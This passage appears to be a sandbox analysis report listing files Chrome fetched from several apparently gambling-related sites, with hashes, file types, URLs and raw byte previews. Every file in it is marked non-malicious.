                                                                                                                                                          SSDEEP:3072:fn1klIkhkKbGUXb+/X5K4qzyutwTw8PG4NYhvUQHoXO0H0BWVPMbj:fnuhhkZy+cYutwE8PG4GOQIF0BWVPU
                                                                                                                                                          MD5:27E34DE2F2296D64B3F5BF4FFCA0E4AA
                                                                                                                                                          SHA1:947C048AD208F8C9962470E6664B0D383A2D6694
                                                                                                                                                          SHA-256:41F75723A62FF6132D037855E2AA24A033224327EB266DB175E87F07020D2678
                                                                                                                                                          SHA-512:DC994D4040277FC76F6D21656E893211A5BAA0CBEC7B1D2295184E8A26401C49A99418F5FA44FDF040FF2E903FFD3470D9573C5FF07C65F4B2855D131EAC0875
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/public/vendor.dll.js
                                                                                                                                                          Preview:var vendor_library=function(t){function e(r){if(n[r])return n[r].exports;var i=n[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,e),i.l=!0,i.exports}var n={};return e.m=t,e.c=n,e.d=function(t,n,r){e.o(t,n)||Object.defineProperty(t,n,{configurable:!1,enumerable:!0,get:r})},e.n=function(t){var n=t&&t.__esModule?function(){return t.default}:function(){return t};return e.d(n,"a",n),n},e.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},e.p="",e(e.s=9)}([function(t,e,n){"use strict";function r(t){return"[object Array]"===O.call(t)}function i(t){return"[object ArrayBuffer]"===O.call(t)}function o(t){return"undefined"!=typeof FormData&&t instanceof FormData}function a(t){return"undefined"!=typeof ArrayBuffer&&ArrayBuffer.isView?ArrayBuffer.isView(t):t&&t.buffer&&t.buffer instanceof ArrayBuffer}function u(t){return"string"==typeof t}function s(t){return"number"==typeof t}function c(t){return void 0===t}function l(t){return null!==t&&"object"==typeof t}function f
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):19634
                                                                                                                                                          Entropy (8bit):7.963184945669312
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:GQmYc2gqyEc+Ya0YgdNnx6g5LVW7DZ6/VUlOz0ouU0If1H9MwVlJyFR3ZqmeFliO:GQmYYqdc175dVx6gU7oZ7df1H9M5dFe3
                                                                                                                                                          MD5:1D8F3EE8FF9C810124A834D133E23195
                                                                                                                                                          SHA1:FC6D0D17A984C58E60CB1E7490FD8C730A972197
                                                                                                                                                          SHA-256:620E1BDF3C26704F4070CEED466065CFE6AE105D64F8EA11F1E619F1980E8BC6
                                                                                                                                                          SHA-512:CB8C7FBBF43568AD0FFC76B7CBB831CAFEED921B7DC3ED80960C7524B5DFA504F50E51588602EB84A4BBBABBD0A4ABFCA9608CB7374F929E400161B6BFBC8837
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/dg_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BDA0C9878D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BDA0C9868D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 18660
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3111
                                                                                                                                                          Entropy (8bit):7.9338041567732756
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:7Zk1m3+K/PmNfomGgTLRhIqaF/ul70DCnv:7Z3Pm9oQLR+qaslMCnv
                                                                                                                                                          MD5:BC013C0567C33A98BE0767B19AC106DD
                                                                                                                                                          SHA1:F58C32F32A3072D30F996207BBB089769DD9D826
                                                                                                                                                          SHA-256:D5B7C17D36E6047F07D5C59C4C17DCAC04115103213AF0C84F5A7E898A8DC496
                                                                                                                                                          SHA-512:D5358ADBC2B13E033E91F801F9289C92EF747BB5815ADA9ABA0D99667D57D4156D5A89350DF15F66B6E2E3140397347978FEC174AED09FB1B342DFE09F19417F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/ftl/commonPage/js/theme/default/layer.css?v=3.1.0
                                                                                                                                                          Preview:............ko.8.{...E.$Wy%....M.W`...{@.w.@.h..,...8=..?R|.o.ISt.....c^....Gy.p.!..u...uZ..FJa.. U..t...6.AS........Zpj......_. .a...MWy..-....X.Ey_..?^...<x.A.4..J.e...3n]...*...X..).cK..a..WA.\,...+.P...Q.............E. .;P...=...L...*.H..l[...W.`..n.%7.....4..."+7...=Z....n....k.....O.*1.....oa?4a..K48.n.H<n....W...4.No.~.e.nZpH..,8#U.e....N7...<.Y.).^./.........U.).X...b.$. .:Cr.......8Z~.U-.N..&=..._D...o.hbAh.FW.6.zsB...y..;..!..'..F..f...c.~c.V./....uv.2..1\...X....._..vp{.l.Vp.U.a.*...K.t..@E5.*v.=.]Fm.....y..T,....=D.U3.... \....J..._..dH..h.&..4...O.J...f..Q....Hv@4..6as..<90=..D........-.4.....}.1.r..!,2pB.,..'.d6.kr@v.~.O...)....^R..f3.....L6..cd ........RLG.x..Pe. ...T.P.c...FI..*1].e.n..N.....8....F....K.4...N.f[.H...Jp1.^..L.]...'......O.B.3,....jxh~.a.....a.Yu.@.\).T.......}....o04.%..y<..p.E..:.c......./."..$.)2....c...k/(...z0.....!..:.2}..=....=..<i.z...W.?..e..S8...^..WI...[9....>........\..K?.f..<... .A....?.$....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi1961.hydqef.com/ocs/cc.png?1717972890350
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):31243
                                                                                                                                                          Entropy (8bit):7.989108196958047
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:PeX3eW8Zu3fyaPaOGIz53cb5/hbfJEM2CcGWNBErhZt8oD:IeW8Z23Pz5MbrfJPcGWArTt8y
                                                                                                                                                          MD5:BC3A91C27EB63D6FF4BADA03AF8C42D4
                                                                                                                                                          SHA1:2E9CABAF9E482037413D51D3C2C74A3AEEB606DE
                                                                                                                                                          SHA-256:43EC6B4BFFC2D45C3D8B9C9D815218B60442F33342EFD2E5F8EF35E21361CCDF
                                                                                                                                                          SHA-512:3A3E1FB1FC0CBE83DCB5F25C060160A04F01F76BFF9D9CE0FB1CA4C7612D1AF67803A5E7A6579BB55162E7558896E76D6D0F0BCAE5A4A6395BCEC9A3FA27C257
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 23.2 (Windows)" xmpMM:InstanceID="xmp.iid:5F0A21C393A511EC8BE0A3720CFEC226" xmpMM:DocumentID="xmp.did:5F0A21C493A511EC8BE0A3720CFEC226"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5F0A21C193A511EC8BE0A3720CFEC226" stRef:documentID="xmp.did:5F0A21C293A511EC8BE0A3720CFEC226"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.p...v|IDATx..}..\..........[d7.1..@Bp..).."..:...B.C....%$..@|w..Yw..'.s.Nd7BB).../....y....=..=...8...w.a...g.H.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):36614
                                                                                                                                                          Entropy (8bit):7.990668796429753
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:HeR/46sTQGkpjyrI003N/61uEboqyBBL4ri2hCGiI:HWA6MFkpjnl3N/6gzer
                                                                                                                                                          MD5:212D50254F4155EBAFF6943A76918434
                                                                                                                                                          SHA1:47CE658B628A0B7B0BADD155553D35C9FD13C198
                                                                                                                                                          SHA-256:9EAF7C3D3C73AE2D2FB25DC8769560EADD526196114697033E356798017726DB
                                                                                                                                                          SHA-512:C1C0111D974670944756AC1A2BC35BFEA7657E92B1AFF5841C79427CC115FCC929B2531A7720A7D3901AACF6C294FF65EE531C282BECDD6442F5525013B649D0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/fish/04.png
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 23.2 (Windows)" xmpMM:InstanceID="xmp.iid:59B45EC493A511EC9D32E57823EC70CE" xmpMM:DocumentID="xmp.did:59B45EC593A511EC9D32E57823EC70CE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:59B45EC293A511EC9D32E57823EC70CE" stRef:documentID="xmp.did:59B45EC393A511EC9D32E57823EC70CE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>g.2...wIDATx..}..U...{..ez..mh#MD. V.5..Fc...ILL1j.....b4... vQ.P@.....0....N..>...3HQ.|.9.......z....4..t.z.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6959
                                                                                                                                                          Entropy (8bit):4.76627722805221
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:G4SXFXVXDL+R5NxuHie/moRUgIm/Kv3RKXg+Iw3qCNv5IC80b7Yr+HpH:G7xhDL+jNxzeBVLKJ1LeqCwCxb7YspH
                                                                                                                                                          MD5:829AF863B0CDC4A603919824AE046299
                                                                                                                                                          SHA1:1D417B1553E4ECB7125EBF2005B74255291FBF73
                                                                                                                                                          SHA-256:1DBE4AFBC9ED220C08B9E95577B56F83E2E8E0F7620C5DC18266BB325E5BB271
                                                                                                                                                          SHA-512:E1202FA26FD353DFB2F989D3D45512E0691C062076297399F5FE62F63E7F5B194FEC4A3D7FE2F09BE1A6A945E197E7D68445D33DCC6F80B23A315112D9AE5B6C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/ftl/commonPage/js/float.js
                                                                                                                                                          Preview:/**. * .. (.... top:150). * @example $("#id").Float();. * @param obj : {topSide:150,bottomSide:'auto',floatRight:0|1,side:5,close:selector}. */.$.fn.Float = function (obj) {. var el = this; // ...... var lock = {. topSide: 150,. bottomSide: 'auto',. floatRight: 1,. side: 5, // ..... close: null, // .....,........ // timer: 0, // ...ID.. init: function () {. var locker = this; // ..Float... var ua = navigator.userAgent;. el.css({'position': 'absolute',}); // ....... if (ua.toLowerCase().indexOf('360se') > -1) {. this.isBlock = true;. } else if (ua.toLowerCase().indexOf("theworld") > 0) {. this.isBlock = true;. } else if (ua.toLowerCase().indexOf("msie 7") > 0) {. this.side = 0;. }. this.floatRight === 1 ? el.css('right', th
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 219 x 79, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17880
                                                                                                                                                          Entropy (8bit):7.9720327118657455
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:+Sy4otyOBWOi0aQ4kz/Ic+qQhq8KASjItf8Gz3rDSFHtg0PvB8CaQ:+Sy4MfDQOQlhawCFHt3p8CaQ
                                                                                                                                                          MD5:4E28BC4C8775CF889141050E16111204
                                                                                                                                                          SHA1:E2976FA0EFC742BBCC430199BD45246847742E4A
                                                                                                                                                          SHA-256:A3612A48E702E8D7B66BE0C60DC113EDEE8C89B98F4F0178947B7AA681FA228C
                                                                                                                                                          SHA-512:1E0A39E36696CE83B19EBFE7B888CB0A4A6EEEA6A4FE02583690518D7ACB771941766ABFCB1C546B6622EEFC45E8EBFCB65033A8AB6EFA1AC3C73999853369CB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/game/img_prom02.png
                                                                                                                                                          Preview:.PNG........IHDR.......O.....bt......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:58E188C0F3A011E78E288E74AD5EC4CC" xmpMM:DocumentID="xmp.did:58E188C1F3A011E78E288E74AD5EC4CC"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:58E188BEF3A011E78E288E74AD5EC4CC" stRef:documentID="xmp.did:58E188BFF3A011E78E288E74AD5EC4CC"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>G^....BHIDATx..}...U..33wno{.o...Bh.$@..M..(b.*6T@E.....)....c..*`.TH.....rw...>.{.3s7..K.....d.>s.s..-.....C.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1128
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):729
                                                                                                                                                          Entropy (8bit):7.7132707823149715
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:XKuJmaEICbh+f5Gvy4/4euRvHMTT9E647je2CwulXxSpWdRs1ehQUUXxdEIKKzpN:XKuJHYh+kJKvHSTC7i2CBBOCaghBUjtL
                                                                                                                                                          MD5:ABEE6E3E7F0073095231A74DBC766104
                                                                                                                                                          SHA1:532259FDE6D708973B32D7C68A61C8EDBBDFFDB2
                                                                                                                                                          SHA-256:FFC717CF207464ABE24D9BF9FFF8EBABDAD22C27C8435EA1C0F3FC18DFA31F3F
                                                                                                                                                          SHA-512:CC12E2799FC4E8CC18E38A0129C2D46081C5C2561844B70DBF23252E57758D21300E3C6D37D7E4705C45773AAC37D717F5B7A0ADBB45EB97A97F4BF15F73D812
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-341.dalianjrkj.com:1586/zb-cloud/stat.do?pv=ajax&pa=host.info&domain=yh8613.cc&terminal=1&r=3506563745
                                                                                                                                                          Preview:..........d..o.0.....Q.m...(..".k.IE[5....\.M.%v..Ua...4MB.....!...@..Z....4-.X....y........0.....4...A.f...e.-.X.o..2N,CU.sc9..l<YL..[g...p.....q........r...c.xe.@P..I...!..2.X........J{8...z...eCX....eB....KE5xJ......S.,.4.:VM.V..b(.......1...C.}*.Z.V(.....}..J..!i9Ws.N*.......rXFI..b]....v.Yg.T..\...g...8.^u..w..^...ix...`..H.2}.a.{i..v-S.5q.....0.iv..{X..].R... .z-x.+.s.:...L*...V.<u...(C..0.L.^...*..Tk..e6.'pR..6....f..P.....Q#...z..]...?H.XH..~....)vE .I84.Xw.......q5.t...C.i;QZDT.Py.../n.K..]..N..."....r..:.3.$=...$..O.B.v.9...L4{.B..Y.....x.S/&..x.F..D1.r........%zL.Y.........aj.....a...r..NV().N..w....#...p.L-....|.....?.............t~..,@..5h.$.2......w'........`..h...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 120x120, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=4, software=Adobe ImageReady], baseline, precision 8, 1160x48, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):24478
                                                                                                                                                          Entropy (8bit):7.9351160710806505
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:57f35xXn30os1mjsh/RQglQnIC1QbZYxcafYe1d7a9KqzgutXoP1VzAnziUEV:5j35xXU1mj2+aC6bAcafY8d7aBXotV8a
                                                                                                                                                          MD5:D0B2ABE842A5C1B3526D2BDDF91E783E
                                                                                                                                                          SHA1:4A4B10D198F34505C83DA3F709C7669F4C9DC86C
                                                                                                                                                          SHA-256:F2F8D041C2CEB2923EE64F26AB81991B212F03FABA5D3017C2ECD48597E203C3
                                                                                                                                                          SHA-512:3CF04ADA1D925177963AB93533BD5D99898E95820E72022BD9E14E8844DE87FF76192C397D7C19D6016AA30DDF1B52AF5AC71AC502EDB20949EC15B5ED2B3DD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.image110.com/uploads/c0c87060c0d0344dc06ac6961604f1dd.jpg
                                                                                                                                                          Preview:......JFIF.....x.x.....XExif..MM.*.......1.........>Q...........Q...........Q...............Adobe ImageReady.....C....................................................................C.......................................................................0...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...._.........5ht}5.[t..y.I.8EDVv8..A....5.....n`.w...~&.~$Zim....{.H.#...K<j...>..?..~#~.?.|;..h..k......<].....j!...]9..fU..pRH(...?..q....;]iu..n.^m-...8t..*;F....+..C.>$~.~..C...].&.......M;....R.. T2...v..K(l....s_1.C.[E....H.....x.5I..[.}C|.&.G ..j.bTg.v..~/.G...V^6.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2745
                                                                                                                                                          Entropy (8bit):5.374781918998539
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:Yv1FLJxwewo9Bg8/ZxD9Hk4026jz6PB8z76q5HdKgMfWHLgscB:GjDcoEKJE40OaddrYEJcB
                                                                                                                                                          MD5:ED94992E2255220E47FC4545D9032835
                                                                                                                                                          SHA1:24359CE71BC37683D86E6E1885020A695E32F7E8
                                                                                                                                                          SHA-256:9657D2FE947B21D964D13541AA42FBC3B872C9704445131022D84119915281E6
                                                                                                                                                          SHA-512:62A97159D19E540D6FB38BBA553616A37FAEB17831544AA3AACF07E355DCC640C03F7B2E047F736568DC71B0D86AA59027FF24EF0D8CE7884DA4C0D451154E99
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true; j.charset = 'UTF-8'; j.src = 'https://static.meiqia.com/widget/loader.js'; s.parentNode.insertBefore(j, s); })(window, document, 'script', '_MEIQIA'); _MEIQIA('entId', 'c0f51ba154f1c0d141fccf42aa8b5791');","domainType":1,"agentCode":"101327467971","snType":1,"iconRel":"/fileupload/ll12/202307/202307192352577.png","paymentType":1,"h5AppLayerFlag":1,"zone":"","sn":"ll12","firstPageFlag":1,"forwardUrl":null,"isZone":false,"settings":{"videoProfitDayThreshold":300000,"agentBalanceControlFlat":0,"openUserFeeFlat":1,"openUserPointFlat":0,"lotteryProfitDayThreshold":"1000000","autoDrawAmount":500000,"openAutoDrawFlat":2,"regCaptchaType":"normal","captchaType":"normal","vipShowFlag":0,"smsLoginFlag":0,"thirdpartyTr
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3886
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1700
                                                                                                                                                          Entropy (8bit):7.8866334761266135
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:XBxsbMMWogVUyG3Jrp8jqCrF1/61BLW6/6UF:fsbMMWogVfG31p41/UW6L
                                                                                                                                                          MD5:DDD547D87965C5ACEB45C17C1E52D913
                                                                                                                                                          SHA1:F277900D7CBB53A47A0898323A50F04EBA3E71FA
                                                                                                                                                          SHA-256:C85CD4247F1C40BF3E86A872E1DD96B569E4EB5D3E5254262637F0D5C99615BA
                                                                                                                                                          SHA-512:BC2462979B58DE9EA471E5EA9FC763034074D94FD61D3E6BA0324A7034F8E4791AD1F265BF7B1C75A981CC534F780FE4EF292321C3D4AE4B508A98B3C1197E1B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/lt-cloud/stat.do?pv=ajax&pa=host.info&domain=yh8613.cc&withAgentCode=1&withSettings=1&terminal=1&ts=17972862940461
                                                                                                                                                          Preview:..........|WAo.6...W..$.<[......$@.$u.g.V..%....TH*....P.(0`;.ko.V`...Y.._.$..& .L......}.~. ..$....;;N...YF.I.]G..n..V.n.v.E.%6Z.Z...[.....[..m..*..2.....ot.LD...S........8...c$.~...z..n...f..1...)......3.......`/y... B\`...O.>..._..\.")S.......N..%A..%...}7f(..BX..".I....B..r.........fc='4d9 ...G..&.NR..o_...>9...s.q}...Ce..(..`.......n....rg..-.t.N..D.t.B.{m..............KQ[...S..MwFb....l.nw=..C..z...I..B.h..Q...4=B...b4.K_3.........g..9..*;.+G<<......._j.....w,%.s..rD".....m;2"<."..#*f.?....1.F..........k....RTrv<..).......s......b9*..).U./BX8.!~.?.,$.).Q.Q^.......<.|QL .3.% .JF.......b.k..Jc..@...vEB.&...dj...z.N....u...U`br.....q..zM..>]...).....+..n....c.J...C.OP.'.....y.*.)..k!.c....v.XJ....2...P.........l.hL./..1N.)....U.s8...".,.h..i.c.p..U5J..l..!.Y..d...*d&B..*.k.......lVd.`x.M....].#..1......1 ..r,N.D....2.[.?*.S<W.W i1..%=.X....s...!}..D.b~F...c...?..vJ.]D....Zn...zN...9d...YN.N.. %+...a."kehf.x..^U,..._js.....0..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 635
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):431
                                                                                                                                                          Entropy (8bit):7.4934780132929495
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:XXWJdFuB29sE7jgQaTQIHqlBerth2wEK6wuO2Iu/:XXWJdFsDEQlrHWB2QrUbo
                                                                                                                                                          MD5:EE1F28F59BC095C075D29DCF5A3EE1E9
                                                                                                                                                          SHA1:073584A9DAB2F999BB3BC2B45837232A7182DED5
                                                                                                                                                          SHA-256:B916E0A30F5B07409434924174F16716C008C91182E82CED7438EFE2C9E5C5BA
                                                                                                                                                          SHA-512:47EBF70058592267F62627EC1A09B133C854DDDFCC2B41D7CF2C5506D1AA769656BBCD47FA78D19E744EBC997A7C08E9230EAF1F8654C8EC42965F8C60924D3C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/lt-cloud/stat.do?pv=ajax&pa=host.info&domain=js326.cc&withAgentCode=1&withSettings=1&terminal=1&ts=17972858158246
                                                                                                                                                          Preview:..........T..n.0...<..U...F.n...H..R.U......7.&f.AQ.6.m:.fF?....:.M..N....B....I.pr.,*...2(..6q..5.W6..B......*..6.bTU;...yj...L.g./...zgtSA.Pc..p6H..ha...w.p.F..M.>........N.U.../b[......O..)P....n.5NH.p.l..Y8..7...J.f..U...~[..9.G/zE...7.H......2.F/...*.<g1.[-y...n.o.........I.d.W..0lW.\.$7.L...f..%v..k>...).vX..8.n..Z!...U...j..u.".]E....P......>?+WUl...O.!.&.V..y.<'9...L.-N.#.....5.. ../...........bZ{...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (6075), with CRLF line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):35313
                                                                                                                                                          Entropy (8bit):5.295540132066821
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:4WL+KxZDns9s+CaAttQyYgm+po5THCAAoT5CvohyZVD/aQHAfr6vWgwkDHqAZ:41kZ9auYo2HCA9tlhytv3wa
                                                                                                                                                          MD5:0D329DF2282392F7C5B7DC987318D388
                                                                                                                                                          SHA1:B49E384DB02B755EAB09D4441ECD9538B9488D56
                                                                                                                                                          SHA-256:18AFA71FF8EB7C6184F4AF6D4CC82F3764997BF1D85B4C74070A215EEEF25A3B
                                                                                                                                                          SHA-512:764B95B306F6BE43895AA884C83078357B59DC5081448D76A645C8D056D4C00FF6DB41B3A002C1A167FE22891F1DE836CB2CF86CB1091068C3E370D602499394
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://xpj723.cc/default.html
